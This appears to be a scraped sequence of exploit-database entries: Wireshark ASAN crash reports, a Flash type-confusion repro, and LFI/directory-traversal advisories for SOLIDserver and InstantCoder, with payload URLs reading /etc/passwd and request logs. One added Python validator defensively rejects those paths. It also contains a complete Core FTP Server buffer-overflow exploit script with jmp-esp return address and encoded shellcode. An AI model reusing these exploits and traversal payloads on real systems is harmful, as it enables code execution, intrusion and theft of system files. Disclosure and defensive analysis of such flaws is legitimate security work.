#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39484.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=640
There is a type confusion vulnerability in the SimpleButton constructor. Flash stores an empty button to use to create buttons for optimization reasons. If this object is created using a SWF tag before it is created in the Button class, and it is not of type Button, type confusion can occur.
A SWF needs to be altered in a hex editor to reproduce this issue. To start, build button.fla. This is a swf with the code:
var sb = new SimpleButton();
and a font attached. Decompress the swf using flasm -x button.swf, and then replace all occurrences of the font ID (0x0001) in the three tags that use it with the ID of the empty button object (0xfff6).
When the button is created, the font will be type confused with a button.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39476.zip
Title: SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: SOLIDserver
Tested Version: 5.0.4 and 4.0.2
Vendor: efficient IP http://www.efficientip.com
Google Dork: SOLIDserver login
Date: 17 Feb 2016
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
About Product :
---------------
EfficientIP's IP Address Management (IPAM) solution adapts to business and IT goals and objectives by allowing the creation of specific IPAM and VLANs deployment processes.
SOLIDserver™ IPAM is a unified solution that allows you to design, deploy, and manage the IP addressing plan automatically applying allocation rules and simplifying deployments.
Vulnerability Details:
----------------------
Based on a code review of the product, some parameters are not validated, which allows an attacker to read file contents.
PoC 1:
-----
https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd
or
view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd
PoC 2 : [login authentication required]
------
https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
#EOF
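Added example (not part of the advisory, and not vendor code): a server-side containment check in Python that refuses the report_filename and config_file values shown in PoC 1 and PoC 2 above. The directory /var/example/reports and the names resolve_download and audit are assumptions made for the illustration.

```python
import os
import re

# Assumption for the example: downloadable files live under this directory.
# The advisory does not say where the product keeps them.
REPORT_DIR = "/var/example/reports"

# One path component: letters, digits, dot, underscore, hyphen. Anything else,
# including '%' left over from percent-encoding, is refused rather than decoded.
_COMPONENT = re.compile(r"^[A-Za-z0-9._-]{1,128}$")


def resolve_download(user_value, base_dir=REPORT_DIR):
    """Map a request parameter to a file under base_dir.

    Returns the canonical absolute path, or None when the value must be refused.
    """
    if not user_value or "\x00" in user_value:
        return None
    # An absolute value such as /etc/passwd would make os.path.join discard
    # base_dir entirely, so it is rejected before any joining happens.
    if user_value.startswith(("/", "\\")):
        return None
    parts = user_value.split("/")
    for part in parts:
        if part in (".", "..") or not _COMPONENT.match(part):
            return None
    base = os.path.realpath(base_dir)
    # realpath follows symlinks, so a link inside base_dir that points
    # elsewhere is caught by the containment test below.
    candidate = os.path.realpath(os.path.join(base, *parts))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Parameter values from the advisory's PoC URLs, plus two constructed ones.
SAMPLES = [
    "/etc/passwd",                                            # PoC 1
    "../../../../../../../../../../../../etc/passwd",         # PoC 1
    "../../../../../../../../../../../../../../etc/hosts",    # PoC 2
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",                         # constructed
    "weekly/report-2016-02.pdf",                              # constructed, benign
]


def audit(values, base_dir=REPORT_DIR):
    """Return {value: resolved path or None} for a list of request values."""
    return {value: resolve_download(value, base_dir) for value in values}


if __name__ == "__main__":
    for value, resolved in audit(SAMPLES).items():
        print("ALLOW" if resolved else "DENY ", value, "->", resolved)
```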
Document Title:
===============
InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1738
Release Date:
=============
2016-02-22
Vulnerability Laboratory ID (VL-ID):
====================================
1738
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
for you to code and debug web apps on your lovely iPhone and iPad.
(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2016-02-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shumin Sun
Product: InstantCoder - iOS (Web-Application) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The file include vulnerability allows remote attackers to include local file/path requests or system-specific path
commands without authorization to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject their own
files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
file/path include execution occurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
inject the lfi payload by using the wifi interface or the local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./toolkit/upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2
A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The vulnerability allows remote attackers to gain unauthorized access to path variables to compromise the web-application or mobile device.
The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
manipulate the path variable in a GET or POST method request to compromise the application. The request method to inject the payload is
POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
variable is not encoded or parsed. This allows an attacker to inject values that give unauthorized access to the local system or app path.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./listFiles
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Vulnerable Source
javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Content-Length[819]
Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------29343138867419
Content-Disposition: form-data; name="path"
-----------------------------29343138867419
Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[4995]
Date[Mon, 22 Feb 2016 08:33:04 GMT]
Reference(s):
http://localhost:8080/toolkit/upload
http://localhost:8080/toolkit/index.html
1.2
The directory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
PoC: Vulnerable Source
<p></p>
<div id="list-file"><a href="javascript:changePath("/.././../../../../../../../../../../etc/%00");">
<div class="folder"><img><iframe></div></a></iframe></div></a></div>
</div>
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[162]
Date[Mon, 22 Feb 2016 08:09:34 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:37 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:45 GMT]
Reference(s):
http://localhost:8080/listFiles
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
1.2
The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
#-*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link:
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : Buffer overflow
[+] Detail :
[-] This is a typical buffer overflow vulnerability.
[-] Insert the string into the 'Log filename(include path)' field under [setup] - [new] - [Logging options] - [More]
[-] The 'Log filename(include path)' field has no length limit and the length is not checked
[-] Insert string "A"*1500 and press Ok, OK
[-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
'''
import struct
junk = "A" * 312
EIP = struct.pack("<L",0x7795163b) # USER32!gSharedInfo+0x181fb:
# 7795163b ffe4 jmp esp
nop = "\x90" * 10
#windows/exec calc.exe
#encode : alpha_mixed
sehll = (
"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)
payload = junk + EIP + nop + sehll
with open("CoreFTPServer_Ex.txt","wb") as f :
    f.write(payload)
Source: https://code.google.com/p/google-security-research/issues/detail?id=656
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
READ of size 4 at 0x7f72db15e078 thread T0
#0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
#1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
#2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
#3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
#8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
#9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
#42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#43 0x5264eb in process_packet wireshark/tshark.c:3728:5
#44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
